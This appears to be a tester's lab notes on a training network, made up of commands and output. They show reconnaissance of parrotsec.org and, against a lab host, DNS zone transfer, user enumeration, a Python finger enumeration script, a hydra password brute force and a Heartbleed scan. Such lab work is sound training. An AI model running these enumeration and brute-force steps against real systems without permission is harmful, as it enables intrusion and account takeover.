[recon-ng][default] > workspaces create hackerhouse- Error:
[*] No modules enabled/installed.
$theHarvester -d parrotsec.org -b google
*******************************************************************
* _ _ _ *
* | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
* | __| _ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
* | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
* \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
* *
* theHarvester 4.0.0 *
* Coded by Christian Martorella *
* Edge-Security Research *
* [email protected] *
* *
*******************************************************************
[*] Target: parrotsec.org
Searching 0 results.
Searching 100 results.
Searching 200 results.
Searching 300 results.
Searching 400 results.
Searching 500 results.
[*] Searching Google.
[*] No IPs found.
[*] Emails found: 2
----------------------
[email protected]
[email protected]
[*] Hosts found: 11
---------------------
archive.parrotsec.org:51.83.238.32, 51.79.178.45, 139.99.69.216
community.parrotsec.org:51.79.178.45, 139.99.69.216
community.parrotsec.org:139.99.69.216, 51.79.178.45
deb.parrotsec.org:139.99.69.216, 51.79.178.45
docs.parrotsec.org:139.99.69.216, 51.79.178.45
irc.parrotsec.org:51.79.178.45, 139.99.69.216
lists.parrotsec.org:51.79.178.45, 139.99.69.216
nest.parrotsec.org:51.79.178.45, 139.99.69.216
u003darchive.parrotsec.org:139.99.69.216, 51.79.178.45
www.parrotsec.org:139.99.69.216, 51.79.178.45
- Metagoofil
- goofileN Custom small projec written in Nim for ParrotOS which is merged of ideas of goofile and metagoofil
- Maltego
- LinkdedInt
- shodan
- nslookup
$nslookup
> set querytype=SOA
> parrotsec.org
Server: 1.1.1.1
Address: 1.1.1.1#53
Non-authoritative answer:
parrotsec.org
origin = pola.ns.cloudflare.com
mail addr = dns.cloudflare.com
serial = 2038500112
refresh = 10000
retry = 2400
expire = 604800
minimum = 3600
Authoritative answers can be found from:
> set querytype=MX
> parrotsec.org
Server: 1.1.1.1
Address: 1.1.1.1#53
Non-authoritative answer:
parrotsec.org mail exchanger = 20 mailserver1.parrotsec.org.
parrotsec.org mail exchanger = 10 mailserver2.parrotsec.org.
parrotsec.org mail exchanger = 1 mail.parrotsec.org.
Authoritative answers can be found from:
- dig
dig parrotsec.org ANY
; <<>> DiG 9.16.15-Debian <<>> parrotsec.org ANY
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOTIMP, id: 41055
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
;; QUESTION SECTION:
;parrotsec.org. IN ANY
;; Query time: 47 msec
;; SERVER: 1.1.1.1#53(1.1.1.1)
;; WHEN: Tue Oct 26 00:12:17 +07 2021
;; MSG SIZE rcvd: 42
$dig @192.168.56.7 chaos authors.bind txt
; <<>> DiG 9.16.15-Debian <<>> @192.168.56.7 chaos authors.bind txt
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 4671
;; flags: qr aa rd; QUERY: 1, ANSWER: 15, AUTHORITY: 1, ADDITIONAL: 1
;; WARNING: recursion requested but not available
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;authors.bind. CH TXT
;; ANSWER SECTION:
authors.bind. 0 CH TXT "Danny Mayer"
authors.bind. 0 CH TXT "Damien Neil"
authors.bind. 0 CH TXT "Matt Nelson"
authors.bind. 0 CH TXT "Jeremy C. Reed"
authors.bind. 0 CH TXT "Michael Sawyer"
authors.bind. 0 CH TXT "Brian Wellington"
authors.bind. 0 CH TXT "Mark Andrews"
authors.bind. 0 CH TXT "James Brister"
authors.bind. 0 CH TXT "Ben Cottrell"
authors.bind. 0 CH TXT "Michael Graff"
authors.bind. 0 CH TXT "Andreas Gustafsson"
authors.bind. 0 CH TXT "Bob Halley"
authors.bind. 0 CH TXT "Evan Hunt"
authors.bind. 0 CH TXT "JINMEI Tatuya"
authors.bind. 0 CH TXT "David Lawrence"
;; AUTHORITY SECTION:
authors.bind. 0 CH NS authors.bind.
;; Query time: 3 msec
;; SERVER: 192.168.56.7#53(192.168.56.7)
;; WHEN: Tue Oct 26 00:15:59 +07 2021
;; MSG SIZE rcvd: 441
$dig @192.168.56.7 axfr nsa.gov
; <<>> DiG 9.16.15-Debian <<>> @192.168.56.7 axfr nsa.gov
; (1 server found)
;; global options: +cmd
nsa.gov. 3600 IN SOA ns1.nsa.gov. root.nsa.gov. 2007010401 3600 600 86400 600
nsa.gov. 3600 IN NS ns1.nsa.gov.
nsa.gov. 3600 IN NS ns2.nsa.gov.
nsa.gov. 3600 IN MX 10 mail1.nsa.gov.
nsa.gov. 3600 IN MX 20 mail2.nsa.gov.
fedora.nsa.gov. 3600 IN TXT "The black sparrow password"
fedora.nsa.gov. 3600 IN AAAA fd7f:bad6:99f2::1337
fedora.nsa.gov. 3600 IN A 10.1.0.80
firewall.nsa.gov. 3600 IN A 10.1.0.105
fw.nsa.gov. 3600 IN A 10.1.0.102
mail1.nsa.gov. 3600 IN TXT "v=spf1 a mx ip4:10.1.0.25 ~all"
mail1.nsa.gov. 3600 IN A 10.1.0.25
mail2.nsa.gov. 3600 IN TXT "v=spf1 a mx ip4:10.1.0.26 ~all"
mail2.nsa.gov. 3600 IN A 10.1.0.26
ns1.nsa.gov. 3600 IN A 10.1.0.50
ns2.nsa.gov. 3600 IN A 10.1.0.51
prism.nsa.gov. 3600 IN A 172.16.40.1
prism6.nsa.gov. 3600 IN AAAA ::1
sigint.nsa.gov. 3600 IN A 10.1.0.101
snowden.nsa.gov. 3600 IN A 172.16.40.1
vpn.nsa.gov. 3600 IN A 10.1.0.103
web.nsa.gov. 3600 IN CNAME fedora.nsa.gov.
webmail.nsa.gov. 3600 IN A 10.1.0.104
www.nsa.gov. 3600 IN CNAME fedora.nsa.gov.
xkeyscore.nsa.gov. 3600 IN TXT "knock twice to enter"
xkeyscore.nsa.gov. 3600 IN A 10.1.0.100
nsa.gov. 3600 IN SOA ns1.nsa.gov. root.nsa.gov. 2007010401 3600 600 86400 600
;; Query time: 0 msec
;; SERVER: 192.168.56.7#53(192.168.56.7)
;; WHEN: Tue Oct 26 00:16:35 +07 2021
;; XFR size: 27 records (messages 1, bytes 709)
- fierce
fierce --dns-servers 192.168.56.7 --domain nsa.gov
NS: ns1.nsa.gov. ns2.nsa.gov.
SOA: ns1.nsa.gov. (10.1.0.50)
- dnsrecon
$dnsrecon -d nsa.gov -n 192.168.56.7
[*] Performing General Enumeration of Domain: nsa.gov
[*] DNSSEC is configured for nsa.gov
[*] DNSKEYs:
[*] None ZSK RSASHA1NSEC3SHA1 03010001a388d849849780d306207a85 02159c28a004f60fb376bccf88d99f21 b300c0922b33e7372bca1e6bdf6f5c2d 3bbc0ce02b6effcf4a47269a23a121b6 c8af7bb60dc82916c962436d6d52969f 00494ece4e3513dca2354009c0676e4b e413ce2b1e7017ce4dfed731974234cd 811652b1267ce987c91a24d28bdf7ea0 4780aac7
[*] None ZSK RSASHA1NSEC3SHA1 03010001c0c3d369835f895767f0138e 356864464ab267c30a80b99352ee2c84 ea813ba333eff414485c2c3225e831e3 3bd9e737aa0bb47359b24f49f9939b9f 87fa63e38cb823ed797b724fb96e40c3 723c5038c31f901d3f11ddb603f4faf8 648e76be9ed433a748dba757e0d4ea3c 4b6e874411acb1f4b61e7bf4eca0bcec 4e9a49ef
[*] None KSk RSASHA1NSEC3SHA1 03010001c7599346c3ee0382fdb4787a 4c8139d992072476bbfad2bbed3113cc e8b8514c5c0fabdf99a1d86a138c9a24 24ae3c4150a87e45fa4f9b034776f528 c9729514139ec5bf10afe018cd686f81 f2bf045924ccd2351abb9ec383867ad3 309e113d46b99d1d4d0be62027fecf2f 9485a96d62a13e5a2a7c4e362a885241 abc5b6b397caa1ea06a16941100ce9f6 67b0afa0bd09b2e0b403fecd451c8dbb f19f6e310149a40c34f5d4b6dc522036 b547387eb4bcc8d8db28f0af9e5103c7 2bf6ca9f3389b24c9ed4dbd4448895ca 22d419cf4178b46ca17dea10eea59957 95cb18d0724d896a33b8ac0cbf46d10f 3c1ebdef5e97829ee64f0f3a2badcbc5 b5f7a2e7
[*] NS ns2.nsa.gov 10.1.0.51
[*] NS ns1.nsa.gov 10.1.0.50
[*] MX mail2.nsa.gov 10.1.0.26
[*] MX mail1.nsa.gov 10.1.0.25
[*] Enumerating SRV Records
[+] 0 Records Found
- dnsenum
$smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t 192.168.56.7(very long list)$ismtp -h 192.168.56.7 -e /usr/share/wordlists/metasploit/unix_users.txt(very long list)- Custom python file to enumerate finger service
$cat finger_enum.py
import argparse
import socket
def recv_all(s):
result = ""
buf = 32
while True:
data = s.recv(buf)
result += data.decode()
if not data:
return result
def do_enumerate(target, wordlist):
for username in open(wordlist):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, 79))
s.send(username.encode())
result = recv_all(s)
if "No one logged on" not in result and "no such user" not in result:
print(result)
s.close()
except Exception as error:
print(error)
parser = argparse.ArgumentParser()
parser.add_argument("-t", help="target")
parser.add_argument("-w", help="wordlist file")
args = parser.parse_args()
do_enumerate(args.t, args.w)
Result
python3 finger_enum.py -t 192.168.56.7 -w /usr/share/wordlists/metasploit/unix_users.txt
Login: backup Name: backup
Directory: /var/backups Shell: /usr/sbin/nologin
Never logged in.
No mail.
No Plan.
Login: bin Name: bin
Directory: /bin Shell: /usr/sbin/nologin
Never logged in.
No mail.
No Plan.
Login: colord Name: colord colour management daemon
Directory: /var/lib/colord Shell: /bin/false
Never logged in.
No mail.
No Plan.
-- very long result --
- custom tool logidoor for web mail server: Ran with false positive of login analysis
- hydra
$hydra -L mail_user -P mail_password pop3://192.168.56.7result[110][pop3] host: 192.168.56.7 login: johnk password: webmail - sslscan
$sslscan 192.168.56.7
Version: 2.0.10-static
OpenSSL 1.1.1l-dev xx XXX xxxx
Connected to 192.168.56.7
Testing SSL server 192.168.56.7 on port 443 using SNI name 192.168.56.7
SSL/TLS Protocols:
SSLv2 disabled
SSLv3 disabled
TLSv1.0 enabled
TLSv1.1 enabled
TLSv1.2 enabled
TLSv1.3 disabled
TLS Fallback SCSV:
Server does not support TLS Fallback SCSV
TLS renegotiation:
Secure session renegotiation supported
TLS Compression:
Compression disabled
Heartbleed:
TLSv1.2 vulnerable to heartbleed
TLSv1.1 vulnerable to heartbleed
TLSv1.0 vulnerable to heartbleed
Supported Server Cipher(s):
Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 1024 bits
Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 1024 bits
Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 1024 bits
Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
Server Key Exchange Group(s):
TLSv1.2 128 bits secp256r1 (NIST P-256)
SSL Certificate:
Signature Algorithm: sha1WithRSAEncryption
RSA Key Strength: 1024
Subject: hackbloc.linux01.lab
Issuer: Superfish, Inc.
Not valid before: May 12 16:25:00 2014 GMT
Not valid after: May 7 16:25:00 2034 GMT